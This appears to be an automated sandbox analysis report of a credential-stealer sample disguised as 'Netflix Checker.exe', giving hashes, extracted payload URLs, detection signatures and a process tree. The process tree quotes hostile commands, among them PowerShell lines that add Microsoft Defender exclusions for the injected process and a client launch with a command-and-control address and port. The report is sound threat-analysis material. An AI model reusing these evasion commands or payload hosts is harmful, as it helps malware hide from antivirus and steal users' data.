Analysis

  • max time kernel
    20s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/05/2023, 19:52

General

  • Target

    Netflix Checker.exe

  • Size

    643KB

  • MD5

    9c1f23b29ee709485823ccf2eb6c5037

  • SHA1

    f68f8a0a7895c5a2dec90b86b735b9e3e45f07e0

  • SHA256

    086e5a0d6feaae1da9a93b7eccf5f897e13713e58cc6a2ba532ee7fb76be0cef

  • SHA512

    48c88a3ae5374f414c416553b0ade380c4201bc3f0eb7955acc5109ace800ff702d96ca87106fb249366f495aa1d28a239a303c2220d08169cd62fe91ad5745d

  • SSDEEP

    12288:eXAgyuLut6N6LqQzJqkKAulc84bYBbuB1t4cWWzDKuVAccIpGNJ+QD:WkZ6N6LqQzJqk0

Malware Config

Extracted

Family

icarusstealer

Attributes
  • payload_url

    https://blackhatsec.org/add.jpg

    https://blackhatsec.org/remove.jpg

Signatures

  • Detects Redline Stealer samples 2 IoCs

    This rule detects the presence of Redline Stealer samples based on their unique strings.

  • IcarusStealer

    Icarus is a modular stealer written in C# First adverts in July 2022.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Netflix Checker.exe
    "C:\Users\Admin\AppData\Local\Temp\Netflix Checker.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2988
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d1jalohf\d1jalohf.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2784
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES322C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB3BCD603EE54A2880EB431C61909858.TMP"
        3⤵
          PID:1108
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        2⤵
        • Modifies Installed Components in the registry
        • Enumerates connected drives
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:1332
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 192.168.0.162 8880 vUiuCXqqM
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1644
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2240
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            4⤵
              PID:492
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1992
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
              4⤵
                PID:3952
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\Start.exe & exit
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2312
            • C:\Users\Admin\AppData\Local\Temp\Start.exe
              C:\Users\Admin\AppData\Local\Temp\Start.exe
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2672
        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
          1⤵
          • Modifies registry class
          • Suspicious use of SetWindowsHookEx
          PID:3180
        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
          1⤵
            PID:3204

          Network

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                  Filesize

                  2KB

                  MD5

                  968cb9309758126772781b83adb8a28f

                  SHA1

                  8da30e71accf186b2ba11da1797cf67f8f78b47c

                  SHA256

                  92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

                  SHA512

                  4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                  Filesize

                  55KB

                  MD5

                  5b3149d7e3a7d18dd39ff6d3bc1fb0d2

                  SHA1

                  bd2fa8b8988c7065e9f3ed1b4da2380a7dd555cf

                  SHA256

                  4a0553c3e144bd7cda82fb2c5a9711396b28f60ead3c60a1e9f105897be14d88

                  SHA512

                  877085dc160c4b24dc3334cc0e025640a3dc91d4cf5c6a0f4ce33dde9d23791f6e3a2501b1a2651fc8f3e62fb9d8949f29cb10363544d447d32a69f400d82bb7

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  16KB

                  MD5

                  d36dba5bd60f117dd670103615ab4962

                  SHA1

                  a324bf38fb670c234b9c34af5748b5dce9a71859

                  SHA256

                  cae4e88b373cc9ba39ec90b621d8317735787771496241fb775a250e443387a4

                  SHA512

                  b0246673873a8f668f00df6d00d175cdfc6fd11f3a4a613dd980d58e3e68e23435be172f4ce2fd37a7b65ca7c6af5e69cb2fad477f294613127ed8bba68f8cc2

                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{0A6AC72E-ED8C-C16F-38B6-05831557CF24}

                  Filesize

                  36KB

                  MD5

                  8aaad0f4eb7d3c65f81c6e6b496ba889

                  SHA1

                  231237a501b9433c292991e4ec200b25c1589050

                  SHA256

                  813c66ce7dec4cff9c55fb6f809eab909421e37f69ff30e4acaa502365a32bd1

                  SHA512

                  1a83ce732dc47853bf6e8f4249054f41b0dea8505cda73433b37dfa16114f27bfed3b4b3ba580aa9d53c3dcc8d48bf571a45f7c0468e6a0f2a227a7e59e17d62

                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_powershell_exe

                  Filesize

                  36KB

                  MD5

                  94b56d65a8b7f7253aeacac345d4b096

                  SHA1

                  7e11e248ae804d3647479a4fe5f03835a1eee4bc

                  SHA256

                  0f312587a999305794730da6f2198c82a346e64211e2fb054256102ac70315be

                  SHA512

                  538cc0c1b4dc66e8a3c6ca9a17ddac128441874248589bcc6c88b64ad7d3b93ff143867d6fad0002cbb4584e951d0e82441c350396e6d59b73207a3ffe0fc055

                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133274446728997785.txt

                  Filesize

                  75KB

                  MD5

                  65019a5db517d9fb830d8a57406a03ea

                  SHA1

                  817faf2ffe8461f653519e7bd96e7ee75021c891

                  SHA256

                  3ae88b3a99e6b785bdb44760790bc03ac722ef5b673ad5b3ca49b5cc5eecf84f

                  SHA512

                  bcc985d3fa48efcbb4a334b1a341a6686ef6c69f237d6d9bdcd9885696d148519ab824b9150194d783cb03189c1cc00a483f1b73ebce323f1f6a303a05b8ea62

                • C:\Users\Admin\AppData\Local\Temp\RES322C.tmp

                  Filesize

                  1KB

                  MD5

                  3035bd8541e6b3696ee529083d615b06

                  SHA1

                  b7b70a375ff6d2f9f019b83d5bf264feef51b650

                  SHA256

                  aefaad427c7c92f525f38771ca0d0f728b16ccff20403a16ebd1537d111a6535

                  SHA512

                  9224ca3dac8179841437d3f4b52948808384db62168aa957826e723c9900fa6bb801f6ea7a3ad9c74bfd08ef221d8c1b83e6c7ed11dc4e6eb20f19f8d7921503

                • C:\Users\Admin\AppData\Local\Temp\Start.exe

                  Filesize

                  4KB

                  MD5

                  0afcc0acf8a474c01d70a305f36957ae

                  SHA1

                  9e364637913fb211a0c76ad106fcbfb377e51015

                  SHA256

                  26f673de63d5a9e2b11ba40bdcb02142c1202c8a41c8c85ab0ae01623ecd5239

                  SHA512

                  06a812748ea0d43ace98bb8715859ae2848121239e67ccb848b394213b56db6a858a79b70b2a41c990fd8d2dfe52826eea5e20c3bdd066a890ccaafdca431b4b

                • C:\Users\Admin\AppData\Local\Temp\Start.exe

                  Filesize

                  4KB

                  MD5

                  0afcc0acf8a474c01d70a305f36957ae

                  SHA1

                  9e364637913fb211a0c76ad106fcbfb377e51015

                  SHA256

                  26f673de63d5a9e2b11ba40bdcb02142c1202c8a41c8c85ab0ae01623ecd5239

                  SHA512

                  06a812748ea0d43ace98bb8715859ae2848121239e67ccb848b394213b56db6a858a79b70b2a41c990fd8d2dfe52826eea5e20c3bdd066a890ccaafdca431b4b

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2kcq3dka.tez.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • \??\c:\Users\Admin\AppData\Local\Temp\CSCB3BCD603EE54A2880EB431C61909858.TMP

                  Filesize

                  1KB

                  MD5

                  810535a8ae563d6aa53635a1bb1206ff

                  SHA1

                  f5ba39f1a455eb61efe5022b524892249ee75dce

                  SHA256

                  7f2c2a29a5f1c0d994fa4c2fccc11a8f3f5f5d4d97ada18aea94971664c8992f

                  SHA512

                  5662b39b29d33bff2e8de4cf3878a6e58b7a163cc93311f4c82f03e73b239a76bb9064ed0c4a6d01cceb858663462345cae78999cfa3668ef975cf85dfff138d

                • \??\c:\Users\Admin\AppData\Local\Temp\d1jalohf\d1jalohf.0.cs

                  Filesize

                  1KB

                  MD5

                  14846c9faaef9299a1bf17730f20e4e6

                  SHA1

                  8083da995cfaa0e8e469780e32fcff1747850eb6

                  SHA256

                  61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

                  SHA512

                  549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

                • \??\c:\Users\Admin\AppData\Local\Temp\d1jalohf\d1jalohf.cmdline

                  Filesize

                  447B

                  MD5

                  b87d320ec583cdb8226315672a13450c

                  SHA1

                  5476f0687f3f980fcb8147ddbb1fe995aed2a667

                  SHA256

                  46219815f6eeb816c9105da29f1fd6845d18d10a7aebc17cc5f02b7633d83d72

                  SHA512

                  18e8b77dfecf649cc92d380ca57d053094e6aade417009d9e86835158b929cd2bf7f5b4163c91e62406054741f9ec49f191f6cbc9f51f6afea8e120306bc6f9d

                • memory/492-261-0x0000000006870000-0x000000000688E000-memory.dmp

                  Filesize

                  120KB

                • memory/492-324-0x0000000002E80000-0x0000000002E90000-memory.dmp

                  Filesize

                  64KB

                • memory/492-158-0x0000000005930000-0x0000000005F58000-memory.dmp

                  Filesize

                  6.2MB

                • memory/492-159-0x0000000002E80000-0x0000000002E90000-memory.dmp

                  Filesize

                  64KB

                • memory/492-160-0x0000000002E80000-0x0000000002E90000-memory.dmp

                  Filesize

                  64KB

                • memory/492-391-0x0000000007E00000-0x0000000007E08000-memory.dmp

                  Filesize

                  32KB

                • memory/492-390-0x0000000007ED0000-0x0000000007EEA000-memory.dmp

                  Filesize

                  104KB

                • memory/492-389-0x0000000007DB0000-0x0000000007DBE000-memory.dmp

                  Filesize

                  56KB

                • memory/492-388-0x0000000007E30000-0x0000000007EC6000-memory.dmp

                  Filesize

                  600KB

                • memory/492-386-0x000000007F1B0000-0x000000007F1C0000-memory.dmp

                  Filesize

                  64KB

                • memory/492-156-0x00000000052C0000-0x00000000052F6000-memory.dmp

                  Filesize

                  216KB

                • memory/492-382-0x0000000002E80000-0x0000000002E90000-memory.dmp

                  Filesize

                  64KB

                • memory/492-380-0x0000000007C00000-0x0000000007C0A000-memory.dmp

                  Filesize

                  40KB

                • memory/492-379-0x0000000007B80000-0x0000000007B9A000-memory.dmp

                  Filesize

                  104KB

                • memory/492-376-0x000000007F1B0000-0x000000007F1C0000-memory.dmp

                  Filesize

                  64KB

                • memory/492-355-0x0000000070EC0000-0x0000000070F0C000-memory.dmp

                  Filesize

                  304KB

                • memory/492-366-0x0000000006D90000-0x0000000006DAE000-memory.dmp

                  Filesize

                  120KB

                • memory/492-354-0x0000000006E30000-0x0000000006E62000-memory.dmp

                  Filesize

                  200KB

                • memory/492-353-0x0000000002E80000-0x0000000002E90000-memory.dmp

                  Filesize

                  64KB

                • memory/492-323-0x0000000002E80000-0x0000000002E90000-memory.dmp

                  Filesize

                  64KB

                • memory/1332-167-0x00000000029B0000-0x00000000029B1000-memory.dmp

                  Filesize

                  4KB

                • memory/1644-151-0x00000000051F0000-0x0000000005200000-memory.dmp

                  Filesize

                  64KB

                • memory/1644-150-0x0000000000400000-0x0000000000424000-memory.dmp

                  Filesize

                  144KB

                • memory/1644-267-0x00000000051F0000-0x0000000005200000-memory.dmp

                  Filesize

                  64KB

                • memory/2672-165-0x0000000001240000-0x0000000001250000-memory.dmp

                  Filesize

                  64KB

                • memory/2672-326-0x0000000001240000-0x0000000001250000-memory.dmp

                  Filesize

                  64KB

                • memory/2672-157-0x0000000000CF0000-0x0000000000CF8000-memory.dmp

                  Filesize

                  32KB

                • memory/2988-134-0x00000000053B0000-0x000000000544C000-memory.dmp

                  Filesize

                  624KB

                • memory/2988-133-0x00000000009A0000-0x0000000000A46000-memory.dmp

                  Filesize

                  664KB

                • memory/2988-135-0x0000000005450000-0x00000000054E2000-memory.dmp

                  Filesize

                  584KB

                • memory/2988-136-0x0000000006FF0000-0x0000000007594000-memory.dmp

                  Filesize

                  5.6MB

                • memory/2988-139-0x0000000005620000-0x0000000005630000-memory.dmp

                  Filesize

                  64KB

                • memory/3204-198-0x000002B8AA550000-0x000002B8AA570000-memory.dmp

                  Filesize

                  128KB

                • memory/3204-195-0x000002B8A9F40000-0x000002B8A9F60000-memory.dmp

                  Filesize

                  128KB

                • memory/3204-192-0x000002B8A9F80000-0x000002B8A9FA0000-memory.dmp

                  Filesize

                  128KB

                • memory/3952-381-0x0000000002D60000-0x0000000002D70000-memory.dmp

                  Filesize

                  64KB

                • memory/3952-352-0x0000000002D60000-0x0000000002D70000-memory.dmp

                  Filesize

                  64KB

                • memory/3952-166-0x0000000005CB0000-0x0000000005D16000-memory.dmp

                  Filesize

                  408KB

                • memory/3952-387-0x000000007FC30000-0x000000007FC40000-memory.dmp

                  Filesize

                  64KB

                • memory/3952-325-0x0000000002D60000-0x0000000002D70000-memory.dmp

                  Filesize

                  64KB

                • memory/3952-164-0x00000000053B0000-0x00000000053D2000-memory.dmp

                  Filesize

                  136KB

                • memory/3952-161-0x0000000002D60000-0x0000000002D70000-memory.dmp

                  Filesize

                  64KB

                • memory/3952-162-0x0000000002D60000-0x0000000002D70000-memory.dmp

                  Filesize

                  64KB

                • memory/3952-168-0x0000000005D20000-0x0000000005D86000-memory.dmp

                  Filesize

                  408KB

                • memory/3952-378-0x0000000007D20000-0x000000000839A000-memory.dmp

                  Filesize

                  6.5MB

                • memory/3952-377-0x000000007FC30000-0x000000007FC40000-memory.dmp

                  Filesize

                  64KB

                • memory/3952-356-0x0000000070EC0000-0x0000000070F0C000-memory.dmp

                  Filesize

                  304KB